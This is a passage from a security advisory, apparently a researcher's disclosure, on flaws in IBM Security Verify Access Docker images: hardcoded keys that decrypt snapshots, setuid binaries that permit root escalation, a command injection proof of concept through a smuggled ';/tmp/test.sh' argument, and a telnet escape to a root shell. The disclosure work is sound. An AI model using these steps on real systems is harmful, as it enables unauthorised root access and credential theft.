                    a9:78:d9:22:27:03:40:7c:ce:06:cb:81:91:be:1c:
                    fa:27:88:88:30:cd:bb:b8:95:12:52:14:66:86:8e:
                    7b:89:1f:57:1c:58:fb:f1:b8:3b:6f:e5:1d:ba:5f:
                    81:21:9c:bf:51:7b:02:62:1c:34:ea:d5:14:67:3f:
                    f5:ea:42:36:b7:b8:7c:2c:28:2e:32:52:5c:af:84:
                    17:17:f8:57:28:4c:ac:ea:e3:2e:f6:e1:96:6c:d8:
                    62:0c:f9:0e:1d:e0:eb:17:02:89:90:cf:74:de:11:
                    64:fd:b7:2a:fb:80:28:03:27:c5:b7:5a:fa:44:50:
                    4e:a6:a6:f9:b4:38:fb:a3:16:2b:c0:33:d5:ac:e9:
                    b6:3b:cd:c6:6b:aa:35:38:35:cb:7f:fe:0a:bd:aa:
                    56:6e:28:c5:9a:9f:af:2f:13:ec:8c:a8:90:24:08:
                    22:e1:e9:81:bc:10:0f:93:53:f4:d0:3f:87:02:78:
                    22:22:50:10:42:e8:0d:51:08:c6:c2:03:db:7b:02:
                    05:93:94:93:f1:b8:f4:dd:81:31:13:2d:15:c3:94:
                    c2:56:85:6c:6e:4c:65:ad:91:7a:eb:49:76:96:23:
                    00:53:93:85:d5:7d:e2:b6:c6:46:2c:44:f3:45:98:
                    16:75
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Authority Key Identifier: 
                57:6A:88:F7:1D:1B:14:0B:A2:3E:C2:16:B7:15:C3:7D:9E:0F:A3:0C
            X509v3 Subject Key Identifier: 
                57:6A:88:F7:1D:1B:14:0B:A2:3E:C2:16:B7:15:C3:7D:9E:0F:A3:0C
    Signature Algorithm: sha256WithRSAEncryption
    Signature Value:
        6f:9b:85:f2:ca:2a:dc:a3:2e:ba:f7:d9:36:40:d4:d4:4d:31:
        a4:ac:23:2e:6e:f0:9f:04:90:d7:f5:ec:d1:31:7c:39:db:80:
        20:7d:a2:6c:f5:30:f1:b6:c0:8c:1d:9f:32:87:a0:84:fe:22:
        ac:8f:0e:d8:36:03:6d:69:29:e2:57:0c:b3:9b:05:c4:e0:1e:
        81:51:eb:33:49:c3:d3:e1:f2:4e:c0:ca:0c:5a:a8:f9:5d:54:
        1f:cf:be:c0:9a:70:c4:6f:94:65:70:14:9f:1b:74:29:6e:eb:
        00:1f:55:9b:fe:a1:00:cc:fb:dc:cd:20:35:64:df:d6:a5:a7:
        f4:fb:76:db:d5:aa:6d:67:08:b1:f8:0b:71:37:af:a2:90:c3:
        aa:57:38:5b:48:e7:ae:35:6c:0c:8a:e3:99:7d:90:94:b0:f8:
        1e:13:17:f9:a9:2f:5f:87:35:8b:f5:6d:ac:64:89:28:b0:96:
        0b:6c:fb:b4:8e:d9:f0:26:ad:61:35:f4:cb:a4:59:f8:f6:a0:
        72:eb:82:cd:cf:2d:85:63:cf:c3:27:64:9f:52:07:05:d7:19:
        81:5a:57:4a:92:f5:3f:30:2d:87:bd:fb:96:92:2b:a0:93:e6:
        b8:e8:e5:90:27:70:a8:78:6f:1c:98:11:6e:f9:70:60:0f:2c:
        d8:4c:44:bf
Modulus=B9775524042A5398AEF8D3546A48A978D9222703407CCE06CB8191BE1CFA27888830CDBBB89512521466868E7B891F571C58FBF1B83B6FE51DBA5F81219CBF517B02621C34EAD514673FF5EA4236B7B87C2C282E32525CAF841717F857284CACEAE32EF6E1966CD8620CF90E1DE0EB17028990CF74DE1164FDB72AFB80280327C5B75AFA44504EA6A6F9B438FBA3162BC033D5ACE9B63BCDC66BAA353835CB7FFE0ABDAA566E28C59A9FAF2F13EC8CA890240822E1E981BC100F9353F4D03F8702782222501042E80D5108C6C203DB7B0205939493F1B8F4DD8131132D15C394C256856C6E4C65AD917AEB4976962300539385D57DE2B6C6462C44F345981675
kali-docker# openssl rsa -in ca.key -modulus -noout       
Modulus=B9775524042A5398AEF8D3546A48A978D9222703407CCE06CB8191BE1CFA27888830CDBBB89512521466868E7B891F571C58FBF1B83B6FE51DBA5F81219CBF517B02621C34EAD514673FF5EA4236B7B87C2C282E32525CAF841717F857284CACEAE32EF6E1966CD8620CF90E1DE0EB17028990CF74DE1164FDB72AFB80280327C5B75AFA44504EA6A6F9B438FBA3162BC033D5ACE9B63BCDC66BAA353835CB7FFE0ABDAA566E28C59A9FAF2F13EC8CA890240822E1E981BC100F9353F4D03F8702782222501042E80D5108C6C203DB7B0205939493F1B8F4DD8131132D15C394C256856C6E4C65AD917AEB4976962300539385D57DE2B6C6462C44F345981675

kali-docker# openssl x509 -in encKey.pem -text -noout -modulus
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1362536419271180047 (0x12e8b3a78030ff0f)
        Signature Algorithm: sha1WithRSAEncryption
        Issuer: C=US, O=IBM, OU=GSKIT, CN=encKey
        Validity
            Not Before: Mar 21 04:56:59 2019 GMT
            Not After : Mar 19 04:56:59 2029 GMT
        Subject: C=US, O=IBM, OU=GSKIT, CN=encKey
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:ec:27:86:24:5e:2b:89:57:2b:83:37:62:1b:ca:
                    47:7c:ea:27:94:7c:8a:a5:44:9e:2d:d1:9e:34:09:
                    79:1f:71:4a:12:61:f1:9f:11:49:74:bc:66:bf:85:
                    15:7a:74:18:2b:d1:cb:ec:3f:55:2e:87:c9:4c:c7:
                    59:3b:00:5d:8b:64:1f:f7:1d:fe:36:32:23:78:6f:
                    50:52:84:29:14:ff:f5:03:8f:0d:c8:24:36:e5:a4:
                    3c:40:b3:af:b0:34:72:e3:67:74:e6:bb:88:fc:58:
                    f1:fa:b3:36:84:32:62:ca:74:03:95:5f:78:f8:a4:
                    49:5c:a1:3c:2c:a3:34:7e:17:ed:57:05:ca:7d:1b:
                    e9:e1:23:29:af:4d:ab:24:5b:2f:10:8b:61:07:97:
                    e3:36:a9:ba:f0:1b:d2:22:b2:ca:f5:c1:7d:ca:9c:
                    8e:61:c6:f1:c0:b4:47:e5:c0:5b:b5:a8:87:10:15:
                    d1:28:fe:71:ba:fb:8e:53:ce:1b:88:51:37:a9:d6:
                    37:2a:0c:a4:c5:b2:ec:cc:0e:b9:44:3c:42:c6:a8:
                    75:61:91:8a:d4:68:26:14:b6:21:0e:8d:95:dc:13:
                    a1:ee:7f:2d:74:9c:48:e8:de:70:11:c8:a9:48:a2:
                    6d:c0:f4:68:bc:aa:c7:2a:f5:78:77:47:92:59:65:
                    b1:2d
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            1.3.6.1.4.999999999.999999999.999999999.718375.55524.2.5001: 
                DN.T+L. Z..$.....6B..j.h[i.b-"e>.W...@.m...gV~.L..6..j.)F....`........H.}O4..r...KC.....&bzv.D.6...5..Zx...........wq.5G......b.x}.bQ..~.......%.p.b.<..P.<...$76=...t....O..J.].L..2.(In.A...3...G.E..9..O.........H..U....ih....|07!6.Z6.........`.9.........=
    Signature Algorithm: sha1WithRSAEncryption
    Signature Value:
        bb:0f:22:30:06:39:08:3e:65:e7:67:a2:f7:a0:1a:96:6f:a6:
        75:57:3e:af:b0:64:7d:83:07:47:6c:a3:ce:91:7d:11:94:b5:
        e9:f7:79:74:f0:22:ab:50:c7:49:66:5e:64:0c:63:07:b7:43:
        f2:35:52:e4:2c:cc:c0:1f:b4:ed:2f:18:cb:d3:a0:3c:3f:6d:
        07:88:ad:b6:fe:52:2b:ea:10:0c:9c:0a:f4:04:21:20:95:e9:
        a7:39:e9:6f:f1:83:11:5e:b7:c5:d5:41:f8:d0:4b:bc:a2:d5:
        c6:1b:e0:77:f4:91:f2:1b:23:25:17:42:29:19:3e:ce:4e:39:
        12:e5:29:30:69:6a:fe:47:ba:e6:d8:d5:5e:3c:23:c6:b5:40:
        49:e5:64:7e:69:cc:43:e0:15:ae:f5:dc:d9:8c:27:6f:2e:09:
        25:85:c3:f8:95:44:12:42:6f:c5:d1:e0:41:b2:f0:00:90:2c:
        ea:36:05:1d:df:f3:a3:b6:4f:42:e6:6d:f2:33:bd:9f:ae:3f:
        18:4e:79:08:35:bc:28:15:ac:23:0e:b5:28:23:c2:08:3d:6a:
        39:5d:37:fa:60:13:ef:19:c3:7a:9c:db:f0:19:0c:ac:0d:d0:
        51:b1:1b:ae:22:a4:b7:92:3b:ff:61:a3:0f:1c:6e:52:97:fe:
        2d:65:cb:13
Modulus=EC2786245E2B89572B8337621BCA477CEA27947C8AA5449E2DD19E3409791F714A1261F19F114974BC66BF85157A74182BD1CBEC3F552E87C94CC7593B005D8B641FF71DFE363223786F5052842914FFF5038F0DC82436E5A43C40B3AFB03472E36774E6BB88FC58F1FAB336843262CA7403955F78F8A4495CA13C2CA3347E17ED5705CA7D1BE9E12329AF4DAB245B2F108B610797E336A9BAF01BD222B2CAF5C17DCA9C8E61C6F1C0B447E5C05BB5A8871015D128FE71BAFB8E53CE1B885137A9D6372A0CA4C5B2ECCC0EB9443C42C6A87561918AD4682614B6210E8D95DC13A1EE7F2D749C48E8DE7011C8A948A26DC0F468BCAAC72AF5787747925965B12D
kali-docker# openssl rsa -in encKey.key -modulus -noout

Modulus=EC2786245E2B89572B8337621BCA477CEA27947C8AA5449E2DD19E3409791F714A1261F19F114974BC66BF85157A74182BD1CBEC3F552E87C94CC7593B005D8B641FF71DFE363223786F5052842914FFF5038F0DC82436E5A43C40B3AFB03472E36774E6BB88FC58F1FAB336843262CA7403955F78F8A4495CA13C2CA3347E17ED5705CA7D1BE9E12329AF4DAB245B2F108B610797E336A9BAF01BD222B2CAF5C17DCA9C8E61C6F1C0B447E5C05BB5A8871015D128FE71BAFB8E53CE1B885137A9D6372A0CA4C5B2ECCC0EB9443C42C6A87561918AD4682614B6210E8D95DC13A1EE7F2D749C48E8DE7011C8A948A26DC0F468BCAAC72AF5787747925965B12D
kali-docker#

It is also possible to decrypt the shadow.enc file of a live instance using the hardcoded device_key.kdb:

kali-docker# file shadow.enc                                                                                             
shadow.enc: data
kali-docker# LD_LIBRARY_PATH=/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/lib64:/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/lib64  /home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/sbin/isva_decrypt shadow.enc
kali-docker# cat shadow.enc 
root:!!$6$[REDACTED]:19255:0:99999:7:::
bin:*:18367:0:99999:7:::
daemon:*:18367:0:99999:7:::
adm:*:18367:0:99999:7:::
lp:*:18367:0:99999:7:::
sync:*:18367:0:99999:7:::
shutdown:*:18367:0:99999:7:::
halt:*:18367:0:99999:7:::
mail:*:18367:0:99999:7:::
operator:*:18367:0:99999:7:::
games:*:18367:0:99999:7:::
ftp:*:18367:0:99999:7:::
nobody:*:18367:0:99999:7:::
dbus:!!:19115::::::
systemd-coredump:!!:19115::::::
systemd-resolve:!!:19115::::::
tss:!!:19115::::::
postgres:!!:19151::::::
ldap:!!:19151::::::
admin:$6$[REDACTED]:19255:0:99999:7:::
www-data:*:14251:0:99999:7:::
ivmgr:!!:19151:0:99999:7:::
cluster::19151:0:99999:7:::
pgresql:!!:19151:0:99999:7:::
nfast:!!:19151:0:99999:7:::
tivoli:!!:19151:0:99999:7:::
isam:!!:19151:1:90:7:::

An attacker can easily decrypt the encrypted files inside the snapshot files. These snapshots contain an openldap.zip file containing the OpenLDAP configuration, keytabs, passwords, SSL certificates and private keys.

The encryption mechanism, based on hardcoded keys, is ineffective and provides a false assumption of security.

Details - Local Privilege Escalation using OpenLDAP

It was observed that the official IBM Docker image ibmcom/verify-access contains a Local Privilege Escalation vulnerability.

The binary slapd, used to run OpenLDAP has incorrect permissions, allowing any user to run slapd as root. An attacker can run slapd as root and specify a malicious configuration file that will run code as root.

Using a static analysis, the file system has been extracted and the usr/sbin/slapd program is root:$group and 4755:

kali-docker# docker images
REPOSITORY                     TAG        IMAGE ID       CREATED        SIZE
ibmcom/verify-access-runtime   10.0.4.0   498e181d7395   3 months ago   1.07GB
ibmcom/verify-access-wrp       10.0.4.0   c0003aca743c   3 months ago   442MB
ibmcom/verify-access           10.0.4.0   206efdd7809c   3 months ago   1.53GB
ibmcom/verify-access-dsc       10.0.4.0   959f6f1095e9   3 months ago   305MB

kali-docker# ls -la _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/sbin/slapd
-rwsr-sr-x 1 root user 1916768 Jun  8 01:30 _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/sbin/slapd

While checking on a live system, we can confirm the permissions 4755 (suid bit) are used in the verify-access instance. The owner is root:ivmgr:

[isam@verify-access log]$ ls -la /usr/sbin/slapd
-rwsr-sr-x 1 root ivmgr 1916768 Jun  8 13:30 /usr/sbin/slapd
[isam@verify-access log]$

By default, slapd allows to load external modules (to execute code). These .la files contain information about shared libraries that will be loaded within slapd.

Content of /etc/openldap/slapd.conf:

# Load dynamic backend modules:
# modulepath    /usr/lib/openldap
# moduleload    back_bdb.la
# moduleload    back_ldap.la
# moduleload    back_ldbm.la
# moduleload    back_passwd.la
# moduleload    back_shell.la
moduleload syncprov.la

It is possible to load malicious modules as root using a specific configuration .la file. This will allow a local attacker to get a Local Privilege Escalation as root. For example, we can find a default file that we can change into a malicious file by updating the libdir option to another directory:

kali-docker# cat _verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/usr/lib64/openldap/syncprov.la
# syncprov.la - a libtool library file
# Generated by libtool (GNU libtool) 2.4.6
#
# Please DO NOT delete this file!
# It is necessary for linking the library.

# The name that we can dlopen(3). 
dlname='syncprov-2.4.so.2'

# Names of this library. 
library_names='syncprov-2.4.so.2.11.4 syncprov-2.4.so.2 syncprov.so'
[...]
# Files to dlopen/dlpreopen
dlopen=''
dlpreopen=''

# Directory that this library needs to be installed in:
libdir='/usr/lib64/openldap'

Details - Local Privilege Escalation using rpm

The binary npm has incorrect permissions in the ibmcom/verify-access instance, allowing any user to run rpm as root.

Using a static analysis, with the file system that has been extracted - the usr/bin/rpm program is root:root and 4755:

kali-extraction-docker# docker images
REPOSITORY                     TAG        IMAGE ID       CREATED        SIZE
ibmcom/verify-access-runtime   10.0.4.0   498e181d7395   3 months ago   1.07GB
ibmcom/verify-access-wrp       10.0.4.0   c0003aca743c   3 months ago   442MB
ibmcom/verify-access           10.0.4.0   206efdd7809c   3 months ago   1.53GB
ibmcom/verify-access-dsc       10.0.4.0   959f6f1095e9   3 months ago   305MB

kali-extraction-docker# ls -la ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/bin/rpm 
-rwsr-sr-x 1 root root 21336 Apr  5 14:38 ./_verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/usr/bin/rpm

While checking on a live system, we can confirm the permissions 4755 (suid bit) are used in the verify-access docker image. The file belongs to root:root:

[isam@verify-access /]$ ls -la /usr/bin/rpm
-rwsr-sr-x 1 root root 21336 Apr  6 02:38 /usr/bin/rpm
[isam@verify-access /]$ /usr/bin/rpm
RPM version 4.14.3
Copyright (C) 1998-2002 - Red Hat, Inc. 
This program may be freely redistributed under the terms of the GNU GPL

Usage: rpm [-afgpcdLAlsiv?] [-a|--all] [-f|--file] [--path] [-g|--group] [-p|--package] [--pkgid] [--hdrid] [--triggeredby] [--whatconflicts] [--whatrequires] [--whatobsoletes] [--whatprovides] [--whatrecommends]
        [--whatsuggests] [--whatsupplements] [--whatenhances] [--nomanifest] [-c|--configfiles] [-d|--docfiles] [-L|--licensefiles] [-A|--artifactfiles] [--dump] [-l|--list] [--queryformat=QUERYFORMAT] [-s|--state]
        [--nofiledigest] [--nofiles] [--nodeps] [--noscript] [--allfiles] [--allmatches] [--badreloc] [-e|--erase=<package>+] [--excludedocs] [--excludepath=<path>] [--force] [-F|--freshen=<packagefile>+] [-h|--hash]
        [--ignorearch] [--ignoreos] [--ignoresize] [--noverify] [-i|--install] [--justdb] [--nodeps] [--nofiledigest] [--nocontexts] [--nocaps] [--noorder] [--noscripts] [--notriggers] [--oldpackage] [--percent]
        [--prefix=<dir>] [--relocate=<old>=<new>] [--replacefiles] [--replacepkgs] [--test] [-U|--upgrade=<packagefile>+] [--reinstall=<packagefile>+] [-D|--define='MACRO EXPR'] [--undefine=MACRO] [-E|--eval='EXPR']
        [--target=CPU-VENDOR-OS] [--macros=<FILE:...>] [--noplugins] [--nodigest] [--nosignature] [--rcfile=<FILE:...>] [-r|--root=ROOT] [--dbpath=DIRECTORY] [--querytags] [--showrc] [--quiet] [-v|--verbose]
        [--version] [-?|--help] [--usage] [--scripts] [--setperms] [--setugids] [--setcaps] [--restore] [--conflicts] [--obsoletes] [--provides] [--requires] [--recommends] [--suggests] [--supplements]
        [--enhances] [--info] [--changelog] [--changes] [--xml] [--triggers] [--filetriggers] [--last] [--dupes] [--filesbypkg] [--fileclass] [--filecolor] [--fileprovide] [--filerequire] [--filecaps]
[isam@verify-access /]$

An attacker can run rpm as root to add or remove any package in the system, providing a full root access.

Details - Insecure setuid binaries and multiple Local Privilege Escalation in IBM codes

It was observed that the official IBM Docker ibmcom/verify-access image contains several binaries with incorrect permissions (4755 - suid bit, with root:root or root:ivmgr as ownership) allowing any local user to run these programs as root:

- /opt/PolicyDirector/bin/pdmgrd
- /opt/pdweb/bin/webseald
- /usr/bin/rpm
- /usr/sbin/slapd
- /usr/sbin/mesa_config
- /usr/sbin/mesa_cli
- /usr/sbin/mesa_control
- /usr/sbin/mesa_lcd
- /usr/sbin/mesa_stats

Binaries with the suid bit:

[isam@verify-access]$ ls -la /usr/sbin/slapd
-rwsr-sr-x 1 root ivmgr 1916768 Jun  8 13:30 /usr/sbin/slapd
[isam@verify-access]$ ls -la /usr/sbin/mesa_lcd
-rwsr-xr-x 1 root root 57240 Jun  8 13:29 /usr/sbin/mesa_lcd
[isam@verify-access]$ ls -la /usr/sbin/mesa_control
-rwsr-xr-x 1 root root 98448 Jun  8 13:29 /usr/sbin/mesa_control
[isam@verify-access]$ ls -la /usr/sbin/mesa_config
-rwsr-sr-x 1 root root 2975680 Jun  8 13:29 /usr/sbin/mesa_config
[isam@verify-access]$ ls -la /usr/sbin/mesa_stats
-rwsr-xr-x 1 root root 11176 Jun  8 13:13 /usr/sbin/mesa_stats
[isam@verify-access]$ ls -la /usr/sbin/mesa_cli
-rwsr-xr-x 1 root root 436160 Jun  8 13:29 /usr/sbin/mesa_cli
[isam@verify-access]$ ls -la /usr/bin/rpm
-rwsr-sr-x 1 root root 21336 Apr  6 02:38 /usr/bin/rpm
[isam@verify-access]$ ls -la /opt/PolicyDirector/bin/pdmgrd
-r-sr-sr-x 1 root ivmgr 32040 Jun  8 13:30 /opt/PolicyDirector/bin/pdmgrd
[isam@verify-access]$ ls -la /opt/pdweb/bin/webseald
-r-sr-s--- 1 root ivmgr 29296 Jun  8 13:30 /opt/pdweb/bin/webseald
[isam@verify-access]$ ls -la /opt/dsc/bin/dscd
-r-sr-s--- 1 ivmgr ivmgr 24264 Jun  8 13:30 /opt/dsc/bin/dscd

Four trivial Local Privilege Escalations were found using the suid bit. Some additional LPEs may also exist in these programs. Trivial LPEs can be found everywhere in the mesa_* programs.

An attacker can get Local Privilege Escalations as root inside instances based on the ibmcom/verify-access image.

The code of mesa_* programs contains several trivial vulnerabilities due to the use of the MesaSystem function (and its derivatives) found in the libwsmesa.so library. This function is an insecure wrapper to the execv() function using the arguments /bin/sh -c and attacker-controlled values. The use of /bin/sh -c allows command injections.

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

Details - Local Privilege Escalation using mesa_config - import of a new snapshot

The mesa_config program allows importing a new snapshot. This allows an attacker to get a Local Privilege Escalation as root by importing a new snapshot:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

The function MainApplySnapshot will install the new malicious snapshot as root:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

Details - Local Privilege Escalation using mesa_config - command injections

Exploiting the fips_zeroize_files option in the mesa_config program will provide a root access.

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

The following PoC will provide root privileges inside the current instance:

[isam@verify-access /]$ id
uid=6000(isam) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)
[isam@verify-access /]$ cat /tmp/test.sh 
#!/bin/sh
id > /tmp/id-2

[isam@verify-access /]$ ls -la /tmp/id-2
ls: cannot access '/tmp/id-2': No such file or directory
[isam@verify-access /]$ /usr/sbin/mesa_config fips_zeroize_files "AAAAAAAAAAAAAAAAAAAAAAAA;/tmp/test.sh"
[isam@verify-access /]$ ls -la /tmp/id-2
-rw-rw-r-- 1 root root 102 Oct 13 21:32 /tmp/id-2
[isam@verify-access /]$ cat /tmp/id-2
uid=0(root) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)
[isam@verify-access /]$

Details - Local Privilege Escalation using mesa_cli - import of a new snapshot

The main_cli program is also vulnerable to LPE. This tool allows managing the instance from any user:

[isam@verify-access]$ mesa_cli
Welcome to the IBM Security Verify Access appliance
Enter "help" for a list of available commands
verify-access> help
Current mode commands:
diagnostics           Work with the IBM Security Verify Access diagnostics. 
extensions            List and remove extensions installed on the appliance. 
fips                  View FIPS 140-2 state and events. 
fixpacks              Work with fix packs. 
isam                  Work with the IBM Security Verify Access settings. 
license               Work with licenses. 
lmi                   Work with the local management interface. 
lmt                   Work with the license metric tool. 
management            Work with management settings. 
pending_changes       Work with the IBM Security Verify Access pending
                      changes. 
snapshots             Work with policy snapshot files. 
support               Work with support information files. 
tools                 Work with network diagnostic tools. 
Global commands:
back                  Return to the previous command mode. 
exit                  Log off from the appliance. 
help                  Display information for using the specified command. 
reload                Reload the container configuration. 
shutdown              End system operation and turn off the power. 
state                 Display the current state of the container. 
top                   Return to the top level. 
verify-access> snapshots
verify-access:snapshots> help
Current mode commands:
apply                 Apply a policy snapshot file to the system. 
create                Create a snapshot of current policy files. 
delete                Delete a policy snapshot file. 
get_comment           View the comment associated with a policy snapshot file. 
list                  List the policy snapshot files. 
set_comment           Replace the comment associated with a policy snapshot
                      file. 
Global commands:
back                  Return to the previous command mode. 
exit                  Log off from the appliance. 
help                  Display information for using the specified command. 
reload                Reload the container configuration. 
shutdown              End system operation and turn off the power. 
state                 Display the current state of the container. 
top                   Return to the top level. 
verify-access:snapshots> exit
[isam@verify-access /]$

The apply command inside the snapshots menu allows an attacker to install a new malicious snapshot as root and get a Local Privilege Escalation.

Details - Local Privilege Escalation using mesa_cli - telnet escape shell

Another LPE was found using the telnet client available within mesa_cli: it is possible to escape the telnet client using the ^] keys and get a shell as root:

[isam@verify-access /]$ id
uid=6000(isam) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)
[isam@verify-access /]$ mesa_cli
Welcome to the IBM Security Verify Access appliance
Enter "help" for a list of available commands
verify-access> tools
verify-access:tools> telnet test-server01.lan 22
Trying 10.0.0.14... 
Connected to test-server01.lan. 
Escape character is '^]'. 
SSH-2.0-OpenSSH_8.0
^]
telnet> !sh
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root),55(ldap),1000(ivmgr),1007(pgresql),1009(tivoli),5000(www-data)
sh-4.4# touch /tmp/pwned-root
sh-4.4# exit
exit
^]
telnet> q
Connection closed. 
verify-access:tools> exit
[isam@verify-access /]$ ls -la /tmp/pwned-root
-rw-r--r-- 1 root root 0 Oct 13 22:21 /tmp/pwned-root
[isam@verify-access /]$

The sub_410330 function will execv() telnet through the MesaSpawn function:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

Details - Outdated OpenSSL

It was observed that all the official IBM Docker images (ibmcom/verify-access-runtime, ibmcom/verify-access-wrp, ibmcom/verify-access and ibmcom/verify-access-dsc) contain the outdated OpenSSL package openssl-1.1.1k-6.el8_5.x86_64. This package contains several vulnerabilities that were patched in August 2022.

At the time of the analysis (28 October 2022), these vulnerabilities were patched by Red Hat but the official IBM Docker images were still vulnerable.

Analysis of the libssl.so.1.1.1k files found in the 4 Docker images:

kali-docker# sha256sum **/libssl.so.1.1.1k                                                                                                       
2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10  _verify-access-dsc.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/usr/lib64/libssl.so.1.1.1k
2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10  _verify-access-runtime.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/usr/lib64/libssl.so.1.1.1k
2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10  _verify-access.tar/fc59d355e611a66e66497ba02cb950853718131f53c526f83d59de4cacd888f3/usr/lib64/libssl.so.1.1.1k
2a92ce36e25daa330efd6f68bdd3116968a721218e446f2d5c1f73e3404acf10  _verify-access-wrp.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/usr/lib64/libssl.so.1.1.1k

kali-docker# strings ./_verify-access.tar/fc59d355e611a66e66497ba02cb950853718131f53c526f83d59de4cacd888f3/usr/lib64/libssl.so.1.1.1k|grep 1.1.1
OPENSSL_1_1_1
OPENSSL_1_1_1a
OpenSSL 1.1.1k  FIPS 25 Mar 2021
libssl.so.1.1.1k-1.1.1k-6.el8_5.x86_64.debug

We can confirm the OpenSSL version is provided by the package libssl.so.1.1.1k-1.1.1k-6.el8_5.x86_64.

The security announcement from Redhat patching vulnerabilities in the version libssl.so.1.1.1k-1.1.1k-6.el8_5.x86_64 is RHSA-2022:5818-01 (https://access.redhat.com/errata/RHSA-2022:5818).

The packages patching the vulnerabilities are:

- openssl-1.1.1k-7.el8_6.x86_64.rpm
- openssl-debuginfo-1.1.1k-7.el8_6.i686.rpm
- [...]

With access to live systems, we can confirm that the patches have not been applied and the systems are still vulnerable:

[root@container-01]# podman ps
CONTAINER ID  IMAGE                                                                        COMMAND               CREATED      STATUS                    PORTS                             NAMES
413823e2f7d1  ibmcom/verify-access/10.0.4.0:20220926.6                                4 hours ago  Up 4 hours ago (healthy)  0.0.0.0:7443->9443/tcp            verify-access
a2142514d831  ibmcom/verify-access-runtime/10.0.4.0:20220926.6                        4 hours ago  Up 4 hours ago (healthy)  0.0.0.0:9443->9443/tcp            verify-access-runtime
e0c55b6440cf  ibmcom/verify-access-dsc/10.0.4.0:20220926.6                            4 hours ago  Up 4 hours ago (healthy)  0.0.0.0:8443-8444->8443-8444/tcp  verify-access-dsc
[root@container-01]# for i in 413823e2f7d1 a2142514d831 e0c55b6440cf; do podman exec -it $i bash -c 'rpm -qa|grep -i openssl';echo;done
openssl-1.1.1k-6.el8_5.x86_64
openssl-libs-1.1.1k-6.el8_5.x86_64
apr-util-openssl-1.6.1-6.el8.x86_64

openssl-libs-1.1.1k-6.el8_5.x86_64

openssl-libs-1.1.1k-6.el8_5.x86_64
openssl-1.1.1k-6.el8_5.x86_64

The official Docker images contain known vulnerabilities.

Details - PermitRootLogin set to yes

It was observed that the configuration file /etc/sysconfig/sshd-permitrootlogin will allow the connection from root in the Docker images:

kali-docker# find . | grep sshd-permitrootlogin
./_verify-access.tar/fc59d355e611a66e66497ba02cb950853718131f53c526f83d59de4cacd888f3/etc/sysconfig/sshd-permitrootlogin
./_verify-access-dsc.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/etc/sysconfig/sshd-permitrootlogin
./_verify-access-runtime.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/etc/sysconfig/sshd-permitrootlogin
./_verify-access-wrp.tar/1ca1ca276c7e33ace0fc60a47ce408d95c591a7b5d68a12688d24578c82cadff/etc/sysconfig/sshd-permitrootlogin
kali-docker# cat */*/etc/sysconfig/sshd-permitrootlogin
# This file has been generated by the Anaconda Installer. 
# Allow root to log in using ssh. Remove this file to opt-out. 
PERMITROOTLOGIN="-oPermitRootLogin=yes"
# This file has been generated by the Anaconda Installer. 
# Allow root to log in using ssh. Remove this file to opt-out. 
PERMITROOTLOGIN="-oPermitRootLogin=yes"
# This file has been generated by the Anaconda Installer. 
# Allow root to log in using ssh. Remove this file to opt-out. 
PERMITROOTLOGIN="-oPermitRootLogin=yes"
# This file has been generated by the Anaconda Installer. 
# Allow root to log in using ssh. Remove this file to opt-out. 
PERMITROOTLOGIN="-oPermitRootLogin=yes"

If a SSH server was installed inside the instances, it would be then possible to login as root.

Details - Lack of password for the `cluster` user

It was observed that the cluster user in the Docker image verify-access does not have a password defined in the /etc/shadow file:

kali-docker# cat _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/passwd | grep cluster
cluster:x:5003:1006::/home/cluster:/usr/sbin/wga_clustersh

kali-docker# cat _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/shadow | grep cluster        
cluster::19151:0:99999:7:::

kali-docker# john --show _verify-access.tar/5b72d1a82f5781ef06f5e70155709ab81a57f364644acfa66c0de53e025d4d6b/etc/shadow         
